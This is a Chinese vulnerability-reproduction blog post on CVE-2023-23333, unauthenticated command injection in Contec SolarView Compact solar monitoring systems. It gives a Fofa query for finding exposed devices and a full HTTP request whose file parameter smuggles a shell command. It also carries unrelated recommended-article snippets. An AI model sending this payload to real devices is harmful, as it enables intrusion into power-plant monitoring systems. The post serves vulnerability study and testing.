Contec SolarView Compact < 6.00 远程命令执行漏洞 (CVE-2023-23333)

最新推荐文章于 2024-05-11 01:27:38 发布
最新推荐文章于 2024-05-11 01:27:38 发布
阅读量367 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134204523
版权

Contec SolarView Compact < 6.00 远程命令执行漏洞 (CVE-2023-23333)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

Contec SolarView Compact是日本Contec公司的一个应用系统。提供光伏发电测量系统。攻击者利用该漏洞通过downloader.php绕过内部限制来执行命令。

漏洞影响

Contec SolarView Compact < 6.00

漏洞危害

未经身份认证的攻击者可通过downloader.php执行任意命令

网络测绘

Fofa: body=“SolarView Compact”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

GET /downloader.php?file=%3Bid%00.zip HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

2. 执行命令

id命令

在这里插入图片描述

pwd命令

在这里插入图片描述

小胡yhu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现 || SolarView Compact 存在任意命令执行漏洞(CVE-2023-23333)
失心少年
07-11 936
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Contec SolarView Compact是日本Contec公司的一个应用系统,提供光伏发电测量系统。可以看见输出是倒输出的,tools有位大佬发帖说明base64编码后命令输出就正常了。
SolarView Compact跨站脚本攻击漏洞分析 CVE-2022-31373
afei001
07-09 479
日本公司 Contec专注于定制化嵌入式计算、工业自动化和IoT通信技术。该公司的 SolarView 太阳能监控和可视化产品用于3万多个发电站。SolarView Compact v6.0通过组件Solar_AiConf.php发现了一个跨站点脚本(XSS)漏洞。攻击者可利用该漏洞发起站点脚本(XSS)攻击。
日本SolarView Compact光伏发电测量系统 目录遍历漏洞复现(CVE-2023-40924)
holyxp的博客
09-13 627
Contec(康泰克)是一家专注于定制化嵌入式计算、工业自动化和IoT通信技术的公司。Contec SolarView Compact是Contec公司的一个应用系统,系统可用于远程性能监测、故障排除、系统优化和其他功能,以便对可再生能源生产单位进行远程管理。
2024年2024,2024年最新Golang一年经验面试
最新发布
2401_84904534的博客
05-11 426
不仅实现了对每个数据中心、链路和服务器状态的实时监控,还根据预设规则将用户的访问请求分配到相应的数据中心、链路和服务器,实现了数据流的合理分布,充分利用了所有的数据中心、链路和服务器。攻击者通过命令拼接获取服务器权限。QNAP NAS的/video/p/api/video.php文件的filename参数存在任意文件读取漏洞,这是由于可控的exportFile()参数导致的,即使没有授权,通过构造特定的参数可以绕过身份验证,导致任意文件读取漏洞,这可能会允许攻击者查看敏感信息并获取更高的特权访问。
Goby漏洞更新 | SolarView Compact downloader.php 任意命令执行漏洞CVE-2023-23333
m0_46699477的博客
04-06 814
Contec SolarView Compact是日本Contec公司的一个应用系统,提供光伏发电测量系统。SolarView Compact 6.00以下存在命令注入漏洞,攻击者可以通过downloader.php绕过内部限制执行命令
SolarView Compact 6.00 - rce漏洞CVE-2023-23333
m0_46317063的博客
06-20 510
CVE-2023-23333漏洞复现
InfantLab-Contec-Pulse-Oximeter-in-Matlab.zip
08-08
标题“InfantLab-Contec-Pulse-Oximeter-in-Matlab.zip”表明这是一个与婴儿心率监测相关的项目,使用了Contec品牌的一款脉氧仪,并且数据分析和处理是通过MATLAB编程语言来实现的。MATLAB是一款强大的数学计算软件...
CONTEC DIO-0808LY-USB使用说明书
12-03
CONTEC DIO-0808LY-USB使用说明书
NZ2WL-CN.pdf
03-16
《三菱与CONTEC联合开发的无线LAN适配器NZ2WL系列用户手册》 本产品为三菱电机与CONTEC公司共同研发制造的无线LAN适配器,型号包括NZ2WL-US、NZ2WL-EU、NZ2WL-CN、NZ2WL-KR和NZ2WL-TW,主要用于MELSEC-Q系列。手册...
CONTEC-USB产品.pdf
10-23
CONTEC-USB产品pdf,CONTEC-USB产品
CVE-2023-32233 Linux kernel
sash1mi
05-16 1816
近日,研究人员发现了Linux内核的NetFilter框架中的新漏洞CVE-2023-32233)。该漏洞可被本地用户用于将权限提升为root,并完全控制系统。问题的根源在于是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏的内部状态,从而获得更高权限。该漏洞影响多个Linux内核版本,包括当前的稳定版本v6.3.1。漏洞原文。
CVE漏洞复现-CVE-2023-32233 NetFilter权限提升
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-06 3229
Netfilter是Linux 内核中的网络数据包处理框架(iptables)通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理具体,详情请见。
2023.3.17 | Goby红队版可利用漏洞更新
m0_46699477的博客
03-17 8544
Nacos 身份认证绕过、泛微OA SQL注入、任意文件读取CVE-2023-26256、任意文件上传CVE-2022-39952、 天融信任意文件下载、命令执行漏洞、代码执行CVE-2022-27596、 路径穿越CVE-2022-48253、CVE-2023-25717、Aspera 远程代码执行CVE-2022-47986、SolarView Compact 、CVE-2023-23333、未授权访问、CVE-2022-31474、TurboMail文件读取、Apache默认密码....
Linux内核提权漏洞CVE-2023-32233复测及POC脚本
qq_18209847的博客
05-17 1599
近日,研究人员发现了Linux内核的NetFilter框架中的新漏洞CVE-2023-32233)。问题的根源在于tfilter nf_tables是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏Netfilter nf_tables的内部状态,从而获得更高权限。目前,研究人员还开发了一个PoC。注意:一旦在易受攻击的系统上启动了PoC(概念验证),该系统可能会处于不稳定状态,并且内核内存可能被破坏。我们强烈建议在专用系统上测试PoC,以避免可能的数据损坏。
Outlook特权提升的严重安全漏洞CVE-2023-23379修复说明
sandfeng的博客
03-22 654
在不需要和用户交互的前提下,攻击者利用此漏洞发送特制的电子邮件来获取收件用户的Net-NTLMv2 哈希值。另外,此漏洞可以经由预览窗格预览邮件而触发,让受害者没开信也会遭到攻击。攻击成功后,攻击者可提升受攻击系统账户的权限并获得 SYSTEM 权限,可执行任意代码。微软在2023年3月份的安全更新中,发布了一个针对Outlook特权提升的严重安全漏洞,该漏洞编号是CVE-2023-23397 ,CVSS评分达到9.8。1、将用户添加到受保护的用户安全组,以防止使用 NTLM 作为身份验证机制。
Apache Dubbo 存在反序列化漏洞CVE-2023-23638)
murphysec的博客
03-09 4390
Apache Dubbo 是一款轻量级 Java RPC 框架 该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码
[春秋云镜]CVE-2022-23366
niubi707的博客
11-29 1134
Hospital Management Startup 1.0 sqli 春秋靶场
无胁科技-TVD每日漏洞情报-2022-6-22
wuthreat无胁科技的博客
06-22 406
漏洞名称:Spring Data MongoDB SpEL表达式注入漏洞 漏洞级别:高危 漏洞编号:CVE-2022-22980 相关涉及:Spring Data MongoDB 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-12692漏洞名称:SAP Focused Run 缺乏身份验证检查漏洞 漏洞级别:高危 漏洞编号:CVE-2022-24396 相关涉及:SAP Focused Run 漏洞状态:未定义 参考链
CONTEC 2011-2012产品目录:信息技术与工业解决方案
CONTEC产品综合目录2011-2012是一份详细列出CONTEC公司提供的各种IT和工业技术解决方案的文档。这份目录展示了CONTEC在信息技术领域的广泛产品和服务,包括但不限于: 1. IT解决方案: - 提供针对客户的IT服务,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值